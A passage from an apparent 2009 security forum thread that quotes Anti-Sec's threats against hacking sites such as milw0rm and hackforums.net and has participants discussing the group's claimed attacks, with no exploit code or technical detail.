      This is primarily to prove that we are serious and committed to our primary goal – eradicating full-disclosure of computer vulnerabilities and exploits, and terminating general discussion of hacking for any n00b and script-kiddie to read and review – and learn from.

      We are coming for you hackforums.net…and Milw0rm.com. We haven’t forgotten you, Milw0rm. Our juicy Apache 0-day will terminate both websites, which will cause a major blow to those who support full-disclosure of hacking related information.

      >>

      In 48 hours, the anti-sec movement will publicly unveil working exploit code and full details for the zero-day OpenSSH vulnerability we discovered. It will be posted to the Full-Disclosure security list.

      http://www.theregister.co.uk/2009/07/20/anti_sec_spoof/

    • #25399
      Vedder
      Participant

      It looks like ssanz has just used the recent anti-sec attacks to run with the money he’s made via visit4cash.

      I don’t understand anti-sec attacking imageshack – that was probably more of a PR stunt (by anti-sec) than anything.

      Blackhat-forums and astalavista attacks are keeping in line with their goals though.

      We aren’t going to see the 0day any time soon.

    • #25400
      UNIX
      Participant

      By now N3tD3v, a known group from England, has joined Anti Sec and stated that they were responsible for the hack on Matasano Security. They also announced that they will target milw0rm next.
